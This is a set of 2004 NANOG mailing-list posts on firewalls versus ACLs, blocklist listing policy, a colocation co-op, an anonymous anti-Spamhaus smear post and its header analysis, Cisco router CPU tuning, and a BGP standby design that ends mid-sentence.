Firewall refers to access control. Firewall appliances are dedicated machines that perform firewall functions. ACLs on many router platforms are called firewalls. Juniper calls them firewall filters. My personal context was covered in a reply I sent earlier in this thread that read: Firewalls are logical interventions, costing as little as some processor overhead. Dedicated appliances are only one deployment. Filters on routers also qualify as firewalls. So...I don't disagree with you at all... --ra On Wed, Mar 17, 2004 at 06:33:54PM -, Matt Ryan said something to the effect of: Depending on your chosen vendor the ACL cost is unlikely to be $0 - if you steal CPU cycles from packet forwarding then you incur earlier router upgrade costs and that has a NPV cost increase associated with it. It's just not as obvious as a invoice for a firewall. Matt. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Eric Gauthier Sent: 17 March 2004 17:20 To: [EMAIL PROTECTED] Subject: Re: Firewall opinions wanted please _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) By firewall, do you mean dedicated unit that does statefull filtering or just something that will block packets? We've successfully argued to just about every group here at our University who came to us asking for a firewall that, given what they wanted to achieve, they could accomplish the same thing with simple ACLs... I'm sure that the cost of the ACL's (i.e. $0.00) versus the cost of a firewall also helped them in their decision... Eric :) -- Live Life in Broadband www.telewest.co.uk The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Statements and opinions expressed in this e-mail may not represent those of the company. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender immediately and delete the material from any computer. == -- rachael treu [EMAIL PROTECTED] ..quis costodiet ipsos custodes?..
Re: Firewall opinions wanted please
On Wed, 2004-03-17 at 21:02, Petri Helenius wrote: No, the applications should accept only authorized connections. If that would be the case, there would be no need to filter at packet level. No, since this would be assuming that each application is perfect and there's no such thing as buffer overflows and other software bugs (including those in authentication routines). A firewall is an extra line of defence in preventing malicious packets from reaching the destination app and the more people have one the better (although I'm not sure whether grandma would be too bothered) It's not bulletproof (and could potentially contain a gut itself) but it provides additional security, regardless of authenticaion of connections. -- --- Erik Haagsman Network Architect We Dare BV tel: +31.10.7507008 fax: +31.10.7507005 http://www.we-dare.nl
Re: NetAdmin + sales on NANOG like places.
** Reply to message from Gerald [EMAIL PROTECTED] on Wed, 17 Mar 2004 14:22:25 -0500 (EST) On Wed, 17 Mar 2004, Jonathan M. Slivko wrote: SNIP INTRO SALES BLURB I look forward to talking to you soon. Jonathan M. Slivko [EMAIL PROTECTED] Sales/Network Operations Invisible Hand Networks, Inc. I am currently doing a little of both sales/network admin at my company which competes directly with Jonathan's in the NYC market. I have some ?s about (network admins + sales people) for nanog folk: - As much as I sympathize with JS's desire to get his company name and information out, is this kind of E-mail encouraged/discouraged on NANOG? (AUP: Blatant product marketing is unacceptable. Does this fit?) Would NANOG as a group agree (I know...you can laugh now.) that requests made here for suggestions are more often looking for technical people that have purchased from a company than a slightly biased sales pitch from the company you work for? I'm not an anti-capitalist, but I do like to attempt to keep the SNR down and if companies force sales hats to the networking staff this will become much more prevalent. Jonathan this isn't intended to offend you either, so I hope you don't take it that way. Not that I'm any sort of PTB here (or pretty much anywhere), but I would prefer that sales pitches of the type referenced be taken off list. So if we're polling trolling, that's my opinion. -- Jeff Shultz Loose nut behind the wheel.
Re: Firewall opinions wanted please
On Wed, Mar 17, 2004 at 12:19:53PM -0500, Eric Gauthier said something to the effect of: _Everyone_ (network connected) should have a firewall. My grandma should have a firewall. Nicole, holding dominion over this business network and its critical infrastructure, should _definitely_ have a firewall. ;) By firewall, do you mean dedicated unit that does statefull filtering No. or just something that will block packets? We've successfully argued to just about every group here at our University who came to us asking for a firewall that, given what they wanted to achieve, they could accomplish the same thing with simple ACLs... fire'wall 1. A fireproof wall used as a barrier to prevent the spread of fire. 2. Computer Science. Any of a number of security schemes that prevent unauthorized users from gaining access to a computer network or that monitor transfers of information to and from the network. I'm sure that the cost of the ACL's (i.e. $0.00) versus the cost of a firewall also helped them in their decision... This is just a semantic issue. I am putting any packet-level inspection engine deployed as an access control means into the category of firewall. The confusion here would be akin to my retorting with how on earth are deploying lists of system object access rights going to protect a network edge? ;) ACL has alternate meanings, as well[1]. A sample of what some vendors call some things: Cisco: router packet-level access control = ACL Microsoft: OS object permissioning schema = ACL Linksys: router packet-level access control = firewall Juniper: router packet-level access control = firewall filter :) *, --ra [1]http://whatis.techtarget.com/definition/0,289893,sid9_gci213757,00.html -- k. rachael treu, CISSP [EMAIL PROTECTED] ..quis costodiet ipsos custodes?.. Eric :)
Re: Firewall opinions wanted please
In message [EMAIL PROTECTED], Petri Helenius writes: No, the applications should accept only authorized connections. If that would be the case, there would be no need to filter at packet level. No. Quite apart from the fact that you mean authorized, not authenticated, the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem. Put in a NANOG0-friendly way, they're a scalable security mechanism that can *help* defend you. Think of the endorsement on most tubes of (American) toothpaste: ... has been shown to be an effective decay-preventive dentifrice that can be of significant value when used as directed in a conscientiously applied program of oral hygiene and regular professional care. If all you want to do is say no to all incoming connections on a single machine, you don't need a separate box labeled firewall -- assuming, of course, that your host is properly configured. Most systems aren't configured that way; worse yet, it takes a lot of knowledge to understand how to block things, and when it's ok to do so. (It's an amusing exercise to run ZoneAlarm on a new, out-of-the box Windows machine and see how many different programs think they need to talk to the network, or (worse yet) act as servers.) But it's a lot of work to configure a machine to be that safe, and if you have a hundred or a thousand of them you can't do it; entropy will open up new holes -- that is, open up new sockets for buggy applications -- faster than you can close them down. Add to that that you don't really know what's safe or unsafe, and that you have some services that are convenient for insiders but don't have adequate, scalable authentication on which you can build an authorization mechanism, and you see why firewalls are useful. Perfect? No, of course not. A good idea? Absolutely. --Steve Bellovin, http://www.research.att.com/~smb
Re: Firewall opinions wanted please
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Erik Haagsman wrote: | On Wed, 2004-03-17 at 21:02, Petri Helenius wrote: | |No, the applications should accept only authorized connections. If that |would be the case, there would be no need to filter at packet level. | | | No, since this would be assuming that each application is perfect and | there's no such thing as buffer overflows and other software bugs | (including those in authentication routines). A firewall is an extra | line of defence in preventing malicious packets from reaching the | destination app and the more people have one the better (although I'm | not sure whether grandma would be too bothered) | It's not bulletproof (and could potentially contain a gut itself) but it | provides additional security, regardless of authenticaion of | connections. | | | And I think you have hit it right on the head...another line of defense. Everything I've ever read about security (network or otherwise) suggests that a layered approach increases effectiveness. I certainly don't trust a firewall appliance as my only security device, so I also do prudent things like disable ports and applications that are not in use on my network and enforce authentication and authorization for access to legitimate services. - -- = bep -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2 (MingW32) iD8DBQFAWLiWE1XcgMgrtyYRAjh+AJ9Cio8w/iPuT+EfUK26ku2RdDl9JwCgrN9P Qll6/VX0Z4xVBRf+G0S5HXA= =uFwS -END PGP SIGNATURE-
Re: Update on Querying IADB
127.3.100.3 Accepts unverified sign-ups, gives chance to opt out 127.3.100.5 Has opt-in confirmation mechanism 127.3.100.6 Has and uses opt-in confirmation mechanism 127.3.100.10 All mailing list mail is confirmed opt-in Hmm.. this is loads of fun if you're running a Listserv that has several thousand lists defined, and not all of them have the same policies (for instance, although the vast majority of our lists are 'confirmed opt-in', we have several lists that are bulk-loaded with database extracts for captive audience lists such as all freshmen, all grad students, and so on). In a case like this we would list any IPs from which *only* come confirmed lists separately, so that they would get the 127.3.100.10 listing. Otherwise we would look at the lowest common denominator and use that data code response. Also, the pricing seems a bit whacked - are you *really* expecting sites that have less than 30 customers to pay $200/month? I know a *lot* of people who have formed collectives of 10-15 people who chip in and get a 1U at a colo I've already answered this on the fly, separately, but it bears repeating. If you are talking about non-commercial mailing lists, that would probably qualify for the newsletter publisher rate, which is only $10/month. It's also critical that people understand that you are now talking about *being listed* in IADB, not about querying IADB, which is always free (We've heard from at least one list member who thought these rates being talked about were to *query* the list). It's totally unclear how you can encode an individual listing - that whole stuff to the left of the @ sign thing is rather unhandy... Are you asking about is there a data response code for individual? There *could* be, but we determined that in the scheme of things which most receiving systems care about, it doesn't matter. What matters is the type of mail they send. Anne
net-co-op (was Re: who offers cheap (personal) 1U colo?)
Based on the response I've gotten off-list from people interested in sharing our resources know-how with each other, I've just registered net-co-op.org. In the next couple of days I'll set up a mailing list and a basic web page. Once the mailing list is set up, I'll post another message to NANOG. On the net-co-op mailing list we can hash out a basic charter agreement and get to know each other. More to come... Janet
Re: Firewall opinions wanted please
On Wed, 2004-03-17 at 21:44, Bruce Pinsky wrote: Everything I've ever read about security (network or otherwise) suggests that a layered approach increases effectiveness. I certainly don't trust a firewall appliance as my only security device, so I also do prudent things like disable ports and applications that are not in use on my network and enforce authentication and authorization for access to legitimate services. Good point...and that's exactly why in some cases, especially in SOHO and SMB oriented products, both hardware as well as software vendors can be part of the security problem by advertising their products as the definite solution to all security holes. Truely securing even a single server or host connected to the Internet entails a lot more than just blocking a few ports, let alone securing a network. By marketing the perfect solution to no-too-clueful admins the actual security holes only get bigger and harder to track. -- --- Erik Haagsman Network Architect We Dare BV tel: +31.10.7507008 fax: +31.10.7507005 http://www.we-dare.nl
Spamhaus Exposed
Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ _ Check out MSN PC Safety Security to help ensure your PC is protected and safe. http://specials.msn.com/msn/security.asp
Re: net-co-op (was Re: who offers cheap (personal) 1U colo?)
On Wed, Mar 17, 2004 at 02:01:43PM -0700, Janet Sullivan wrote: Based on the response I've gotten off-list from people interested in sharing our resources know-how with each other, I've just registered net-co-op.org. ... Oh come on, what was .coop for if not this? :) -- Daniel Medina
Re: Firewall opinions wanted please
On Wed, Mar 17, 2004 at 09:48:30AM -0800, Kevin Oberman said something to the effect of: ..snip snip.. I dislike firewalls for many applications, although I have a Sonic Wall on my cable modem. On the whole, they lead to false belief that firewalls really make you safe. They also block many interesting applications. Things like H.323 conferencing are made vastly more complex by firewalls with no easy or canned work-arounds. H.323 is its own complex, unweildy mutant (though a lovely one at that), and it is unfair to throw the baby out with the bathwater in that case. Something like saying that it's rough configure MPLS on your cable modem at home so we should do away with those. Configured properly, firewalls handle H.323 just fine. As for false beliefs... Seat belts aren't guaranteed to save your life if you wrap your car around a tree, but they improve the chances that you won't pierce the windshield with your face. That lid on your coffee cup has a hole in it so you can drink out of it, but that can spill, too.. Still...which way would you rather have that cup--lidded or lidless-- when it goes flying out of your cupholder and into your lap? A stoplight doesn't actually physically stop traffic. Having a green light in your direction doesn't actually guarantee that the intersecting traffic won't plow into you. Sometimes parachutes don't open properly parachute not open properly, but can you imagine if people gave up skydiving altogether, or skydived without them, refusing to be lulled into a false sense of safety? Hrm. This now becomes an issue of adequate education and precaution. It's not the fault of the technology if its users are ill-informed... One large research site I work closely with has directly opted for IDS with a bad attitude (love that description) which has successfully blocked many intrusion and DOS attempts with no major failures. Slammer did overwhelm it, but it did the same for most everything. IDS that reacts is, by classical definition, firewalling. The IDS component merely detects the anomaly. To react is a firewall function. Does IDS not smack of that false sense of security you mentioned? If admins refuse to acknowledge attack conditions because the IDS didn't squawk, does that guarantee that the network is totally peaceful? The end-to-end nature of the net is really, really important, but is being blocked more and more by those who thing the net is web browsing and e-mail clients and that everything else is simply an annoyance. This attitude is hamstringing network development already and may end up turning the commercial Internet into a permanently limited tool with fewer real capabilities that the ARPANET had before TCP/IP replaced NCP. This is a very valid concern. Unfortunately, aside from those in pure academia, this is the bread and butter for most of us. The HTML-for-the-masses and email-happy vox populi are the ones subscribing to providers and buying bandwidth that we are trying to enable. Grandma may need a firewall. (My sister DEFINITELY needs one.) But not all network connections need or will benefit from a firewall. And many system will exist with significant security flaws because the owners believe that the firewall takes care of everything. As do may owners that believe their Microsoft boxes do everything. Or nothing. Or that nothing needs to be done to their MS boxes... *, --ra -- k. rachael treu, CISSP [EMAIL PROTECTED] ..quis costodiet ipsos custodes?.. -- R. Kevin Oberman, Network Engineer Energy Sciences Network (ESnet) Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab) E-mail: [EMAIL PROTECTED] Phone: +1 510 486-8634
Re: net-co-op (was Re: who offers cheap (personal) 1U colo?)
Janet, Since your note earlier today there have been just under 200 fetches of the html. I've written to Byron Henderson and asked him to help me with the coop formation. He and I worked on the .coop sTLD proposal, and as I mention I discussed member-owned colo coop with Carolyn Hoover of the NCBA this week, as well as the similar idea for bloggers as a vhost user class in Rome last week. There are not a lot of cooperatives out there ... Mt. Xinu was employee owned. Poptel was an employee-owned coop in the ISP and hosting markets, including the .coop registry implementor and operator, but recently was forced to convert to structured venture-equity ownership. There is some bandwidth purchaser's cooperative in the South West ... Cheers, Eric
Re: net-co-op (was Re: who offers cheap (personal) 1U colo?)
On Wed, 17 Mar 2004, Daniel Medina wrote: On Wed, Mar 17, 2004 at 02:01:43PM -0700, Janet Sullivan wrote: Based on the response I've gotten off-list from people interested in sharing our resources know-how with each other, I've just registered net-co-op.org. ... Oh come on, what was .coop for if not this? :) People in the poultry business? :-) -- Jay Hennigan - CCIE #7880 - Network Administration - [EMAIL PROTECTED] WestNet: Connecting you to the planet. 805 884-6323 WB6RDV NetLojix Communications, Inc. - http://www.netlojix.com/
Strange message possibly through nanog mail server
I Just received this. I would like to check if others have received it and did it indeed come through nanog mailist: Date: Wed, 17 Mar 2004 21:10:38 + From: Deep Throat [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Spamhaus Exposed Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ ___ And while the website was unavailable and the sender is being anonymous (whichis against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something through this mail list, which makes me think it might have come through merit mail machine but not actually though mail list). What I find even more disturbing is that ip address listed as origin (which may well have been forged if they managed to gain some highier level access to merit servers) is that of US Military. Below is the header for your review. I do however find it slightly more likely that its some kind of sophisticated joe-job on spamhaus and that info is forged but they may have used some bug on merit mail software. Return-Path: [EMAIL PROTECTED] Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) by sokol.elan.net (8.12.5/8.12.5) with ESMTP id i2HMKZdw015368 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 14:20:35 -0800 Received: by trapdoor.merit.edu (Postfix) id CF8FA91307; Wed, 17 Mar 2004 16:11:00 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: by trapdoor.merit.edu (Postfix, from userid 56) id 92B3591328; Wed, 17 Mar 2004 16:11:00 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id BCC5691307 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 16:10:39 -0500 (EST) Received: by segue.merit.edu (Postfix) id A27775DE7B; Wed, 17 Mar 2004 16:10:39 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from hotmail.com (bay13-f78.bay13.hotmail.com [64.4.31.78]) by segue.merit.edu (Postfix) with ESMTP id 5C2B05DE72 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 16:10:39 -0500 (EST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 17 Mar 2004 13:10:38 -0800 Received: from 198.26.130.36 by by13fd.bay13.hotmail.msn.com with HTTP; Wed, 17 Mar 2004 21:10:38 GMT X-Originating-IP: [198.26.130.36] Note this, see below X-Originating-Email: [EMAIL PROTECTED] X-Sender: [EMAIL PROTECTED] From: Deep Throat [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Spamhaus Exposed Date: Wed, 17 Mar 2004 21:10:38 + Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: [EMAIL PROTECTED] X-OriginalArrivalTime: 17 Mar 2004 21:10:38.0810 (UTC) FILETIME=[4C3633A0:01C40C64] Sender: [EMAIL PROTECTED] Precedence: bulk Errors-To: [EMAIL PROTECTED] X-Loop: nanog Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ -- $ host 198.26.130.36 36.130.26.[98.in-addr.arpa domain name pointer BU-WCS1-SAND.NIPR.MIL. [whois.completewhois.com] Elan Completewhois.Com Whois Server, Version 0.91a6, compiled on Jan 02, 2004 Please see http://www.completewhois.com/help.htm for command-line options Use of this server and any information obtained here is allowed only if you follow our policies at http://www.completewhois.com/policies.htm [IPv4 whois information on 198.26.130.36 ] [Query Origin: Main Whois Query ] [whois.arin.net] OrgName:The Defense Information Systems Agency OrgID: DISA Address:DISA/DSSO/JCLCC Address:Room BF655A, The Pentagon City: Washington StateProv: DC PostalCode: 20301 Country:US NetRange: 198.25.0.0 - 198.26.255.255 CIDR: 198.25.0.0/16, 198.26.0.0/16 NetName:NETBLK-DISA-C NetHandle: NET-198-25-0-0-1 Parent: NET-198-0-0-0-0 NetType:Direct Allocation NameServer: AAA-KELLY.NIPR.MIL NameServer: AAA-VAIHINGEN.NIPR.MIL NameServer: AAA-WHEELER.NIPR.MIL NameServer: AAA-VIENNA.NIPR.MIL Comment: RegDate:1992-12-05 Updated:2004-01-13
RE: Strange message possibly through nanog mail server
Got it, came from nanog, originated from DISA (purportedly, anyways): Received: from 198.26.130.36 by by13fd.bay13.hotmail.msn.com with HTTP; Wed, 17 Mar 2004 21:10:38 GMT #whois 198.26.130.36 OrgName:The Defense Information Systems Agency OrgID: DISA Address:DISA/DSSO/JCLCC Address:Room BF655A, The Pentagon City: Washington StateProv: DC PostalCode: 20301 Country:US NetRange: 198.25.0.0 - 198.26.255.255 CIDR: 198.25.0.0/16, 198.26.0.0/16 NetName:NETBLK-DISA-C NetHandle: NET-198-25-0-0-1 Parent: NET-198-0-0-0-0 NetType:Direct Allocation NameServer: AAA-KELLY.NIPR.MIL NameServer: AAA-VAIHINGEN.NIPR.MIL NameServer: AAA-WHEELER.NIPR.MIL NameServer: AAA-VIENNA.NIPR.MIL I *think* I loaded the page in lynx before it got rate-limited, and lynx flashed through a whole mess of fast redirects before faulting out. No logs, unfortunately. Just a question: is this the chinese year of the immature script kiddie or something? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of william(at)elan.net Sent: Wednesday, March 17, 2004 5:58 PM To: [EMAIL PROTECTED] Subject: Strange message possibly through nanog mail server I Just received this. I would like to check if others have received it and did it indeed come through nanog mailist: Date: Wed, 17 Mar 2004 21:10:38 + From: Deep Throat [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Spamhaus Exposed Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ ___ And while the website was unavailable and the sender is being anonymous (whichis against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something through this mail list, which makes me think it might have come through merit mail machine but not actually though mail list). What I find even more disturbing is that ip address listed as origin (which may well have been forged if they managed to gain some highier level access to merit servers) is that of US Military. Below is the header for your review. I do however find it slightly more likely that its some kind of sophisticated joe-job on spamhaus and that info is forged but they may have used some bug on merit mail software. Return-Path: [EMAIL PROTECTED] Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) by sokol.elan.net (8.12.5/8.12.5) with ESMTP id i2HMKZdw015368 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 14:20:35 -0800 Received: by trapdoor.merit.edu (Postfix) id CF8FA91307; Wed, 17 Mar 2004 16:11:00 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: by trapdoor.merit.edu (Postfix, from userid 56) id 92B3591328; Wed, 17 Mar 2004 16:11:00 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id BCC5691307 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 16:10:39 -0500 (EST) Received: by segue.merit.edu (Postfix) id A27775DE7B; Wed, 17 Mar 2004 16:10:39 -0500 (EST) Delivered-To: [EMAIL PROTECTED] Received: from hotmail.com (bay13-f78.bay13.hotmail.com [64.4.31.78]) by segue.merit.edu (Postfix) with ESMTP id 5C2B05DE72 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 16:10:39 -0500 (EST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 17 Mar 2004 13:10:38 -0800 Received: from 198.26.130.36 by by13fd.bay13.hotmail.msn.com with HTTP; Wed, 17 Mar 2004 21:10:38 GMT X-Originating-IP: [198.26.130.36] Note this, see below X-Originating-Email: [EMAIL PROTECTED] X-Sender: [EMAIL PROTECTED] From: Deep Throat [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Spamhaus Exposed Date: Wed, 17 Mar 2004 21:10:38 + Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: [EMAIL PROTECTED] X-OriginalArrivalTime: 17 Mar 2004 21:10:38.0810 (UTC) FILETIME=[4C3633A0:01C40C64] Sender: [EMAIL PROTECTED] Precedence: bulk Errors-To: [EMAIL PROTECTED] X-Loop: nanog Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ -- $ host 198.26.130.36 36.130.26.[98.in-addr.arpa domain name pointer BU-WCS1-SAND.NIPR.MIL. [whois.completewhois.com] Elan Completewhois.Com Whois Server, Version 0.91a6, compiled on Jan 02, 2004 Please see http://www.completewhois.com/help.htm for command-line options Use of this server and any information obtained here is allowed only if you follow our policies at http://www.completewhois.com/policies.htm [IPv4 whois information on 198.26.130.36 ] [Query Origin: Main Whois Query ] [whois.arin.net] OrgName:The Defense
Re: Strange message possibly through nanog mail server
On 17.03.2004 23:57 william(at)elan.net wrote: And while the website was unavailable and the sender is being anonymous (whichis against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something through this mail list, which makes me think it might have come through merit mail machine but not actually though mail list). The envelope-to decides where a mail goes to. All of your body header fields are actually meaningless. What I can say it came thru NANOG. Mozilla junk tool perfectly classified this email as SPAM :-) Arnold
RE: Strange message possibly through nanog mail server
From: william(at)elan.net [mailto:[EMAIL PROTECTED] I Just received this. I would like to check if others have received it and did it indeed come through nanog mailist It came through NANOG, delivered from a Hotmail account that accepted it from 198.26.130.36. Yes, that is a military IP, and most definitely not the first time that spammers have relayed emails through compromised military machines. Spammers broke federal law long before the YOU-CAN-SPAM act. For some reason, Peter Schroebel was CC'ed. You can read more about him at http://www.spamhaus.org/rokso/listing.lasso?-op=cnspammer=Peter%20Schro ebel%20-%20SMS/Fullport Character attacks such as this one are pretty common against anti-spammers, we also had one attempted at Brian Bruns just days ago here on NANOG. Regards Thor Larholm Senior Security Researcher PivX Solutions 24 Corporate Plaza #180 Newport Beach, CA 92660 http://www.pivx.com [EMAIL PROTECTED] Phone: +1 (949) 231-8496 PGP: 0x5A276569 6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569 PivX defines Proactive Threat Mitigation. Get a FREE Beta Version of Qwik-Fix http://www.qwik-fix.net
RE: Strange message possibly through nanog mail server
At 04:58 PM 17/03/2004, Alon Tirosh wrote: I *think* I loaded the page in lynx before it got rate-limited, and lynx flashed through a whole mess of fast redirects before faulting out. No logs, unfortunately. A safe way I find to examine potentially trojaned pages is via fetch (or wget) fetch -o questionable.html url Then you can examine the page with appropriate tools. ---Mike
Re: net-co-op (was Re: who offers cheap (personal) 1U colo?)
net-co-op.org. ... Oh come on, what was .coop for if not this? :) People in the poultry business? :-) chicken.coop was sought for by many, myself included. The Director, Co-op Business Development and Member Services, National Cooperative Business Association, and I are now playing phone tag, so I expect to have some progress to report for a member-owned colo coop on a daily basis. It occurs to me that a member-owned colo coop is not necessarily location-dependent, nor uniquely valued. Eric
Re: Strange message possibly through nanog mail server
On Wednesday, March 17, 2004 5:57 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote: I Just received this. I would like to check if others have received it and did it indeed come through nanog mailist: Date: Wed, 17 Mar 2004 21:10:38 + From: Deep Throat [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Spamhaus Exposed Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ ___ And while the website was unavailable and the sender is being anonymous (whichis against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which if I understood is always supposed to happen when something through this mail list, which makes me think it might have come through merit mail machine but not actually though mail list). What I find even more disturbing is that ip address listed as origin (which may well have been forged if they managed to gain some highier level access to merit servers) is that of US Military. Below is the header for your review. I do however find it slightly more likely that its some kind of sophisticated joe-job on spamhaus and that info is forged but they may have used some bug on merit mail software. I got it to. Let me throw some insight into this - notice the To line: To: [EMAIL PROTECTED] IIRC, thats Peter Schroebel, aka SMS Online. Peter has it out for Steve Linford of SpamHaus because SMS Online is listed for hosting spammers. He claims that SpamHaus wanted $10k from him to be removed. Peter tried to bribe the AHBL a few weeks ago to get us to remove him from our system. Peter likes to gloat about all the connections he has, and how powerful he is (though I have yet to see proof of this). So, I'm not exactly sure what to make of this... It could be Peter, and the mirror of the page I've seen certainly makes it look like something he'd write. But, could be a joe job too. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The Abusive Hosts Blocking List http://www.ahbl.org
Re: Spamhaus Exposed
From Deep Throat, received 17/3/04, 21:10 + (GMT): Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less. -- Steve Linford The Spamhaus Project http://www.spamhaus.org
Re: Spamhaus Exposed
On Wed, 17 Mar 2004, Steve Linford wrote: From Deep Throat, received 17/3/04, 21:10 + (GMT): Disturbing information on one of the founders of Spamhaus.org http://www.geocities.com/jackjack9872004/ Not just a load of BS, but posted to NANOG anonymously, through a hijacked machine at 198.26.130.36 (The Pentagon) no less. federal interest site. thats automatic prison time, isnt it? i suspect the culprit could be prosecuted under PATRIOT, and sent away for quite a _long_ time... -Dan
TCP headre compression and CPU usage on Cisco AS5800
Hi folks. On a cisco AS5800, what are the parameters that could be tweaked to reduce CPU utilization ? With 360 active calls here's what i have: NAS01-MTNDODS#sh proc cpu | exclude 0.00 CPU utilization for five seconds: 79%/17%; one minute: 81%; five minutes: 80% PID Runtime(ms) Invoked uSecs 5Sec 1Min 5Min TTY Process 380428996 4609093 17450 2.19% 1.08% 0.78% 0 Check heaps 7 147676920 1554810 94984 2.43% 4.42% 3.93% 0 Serial Backgroun 29 8102432 16740884483 0.08% 0.18% 0.18% 0 Net Background 6111903404 9770801 1218 0.24% 0.22% 0.23% 0 ISDN 74 8349756642098634624397 7.72% 6.99% 6.93% 0 IP Input 76 3189204 1447125 2203 0.08% 0.04% 0.04% 0 CDP Protocol 79 665792 8520105 78 0.16% 0.13% 0.10% 0 IP Background 91 795916 2427196327 0.08% 0.19% 0.23% 0 PPP IP Route 9231107300 5726565 5432 38.09% 45.42% 45.05% 0 PPP IPCP 12080886604 2196656 36822 0.73% 0.74% 0.74% 0 Compute load avg 14832705256 345451242 94 4.30% 2.52% 2.07% 0 PPP Events 156 3841144 63989161 60 0.08% 0.06% 0.03% 0 IP SNMP 158 8978492 27800036322 0.16% 0.26% 0.16% 0 SNMP ENGINE 210 222569208 2670597 83340 5.60% 5.39% 4.83% 0 AAA Per-User As you see that IPCP process takes ~ 45% of the CPU. Is there a way to disable TCP header compression completely ? Or any other CPU intensive things ? It's an AS5800 with NPE-300 Thanx Paul Paul Khavkine Network Administrator DISTRIBUTEL Communications. 740 Notre Dame West, Suite 1135 Montreal, Quebec, Canada, H3C 3X6 1-514-877-5505 x 263 http://www.distributel.net
Re: Firewall opinions wanted please
the primary purpose of a firewall is to keep the bad guys away from the buggy code. Firewalls are the networks' response to the host security problem. a pretty good sound bite. :) Add to that that you don't really know what's safe or unsafe, and that you have some services that are convenient for insiders but don't have adequate, scalable authentication on which you can build an authorization mechanism, and you see why firewalls are useful. Perfect? No, of course not. A good idea? Absolutely. Er... perhaps. Who is configuring the firewall? What are its capabilities? How easy will it be to deploy new services? I, as an enduser, am abdicating most of my responsibility to or it is being hijacked by one or more network service providers. Ken is right. Firewalls, in general, seem to be a great place for blackhats to focus on. DoS is trivial, the degenerate case is encaps of everything into stuff that passes through the firewall (IP over port 80), and then we've just pushed the problem elsewhere, adding more complexity to the system for little if any improvment in the overall integrity. Sounds like the result is a system that is more fragile. --Steve Bellovin, http://www.research.att.com/~smb --bill (cynic) Noting that the nanog thread of the day has changed, but not n'cessly for the better. :)
Question on possibly using route switch as standby backup to router
(On topic to nanog for a change...) I'll be soon going through resetup of one of our primary hosting POPs (moving to different DC and upstream provider) and as a result have opportunity to make some changes to the configuration, etc and want to set it up so there is standby backup available to the main router. Note that I'm not going to setup complete cisco HSRP, I don't have interest in going this far. The only purpose is to provide service for customers in the POP for short period of time in case of router failure or when router has to be taken down for upgrades. And while the router itself has direct connections to other routers on our network, I'm fine with network being split into segments while the router is down, I do however want customers in that POP to be able to use the primary upstream in that POP (and I'll as a result need to announce only the ip blocks related to that segment in case router goes down) The concept I have in mind is to use our main cisco switch there that also happened to have a router card and could I think do bgp. The idea is to connect one or two upstream GB connections directly into the switch (currently we connect to upstream through port on the router) and then setup vlans from there to go to the router through its gigabit interface (most likely etherchannel logically on the router to be able to expand to multiple interfaces if it is ever needed). Futher instead of doing typical /30 interconnect to upstream, I would like to use /29 there and assign one ip to their router, one to our router and one ip would be on route switch card (which can see each vlan as separate interface). For BGP instead of establishing session directly between interfaces of one and another router, I want to use separate /30 that would be announced to upstream through EBGP (but not go beyond just between these routers) and this /30 would contain ip address to be used for primary BGP session for announcing our routes (for those familiar this is how cogent does it). The idea is then that when everything is working and primary router is 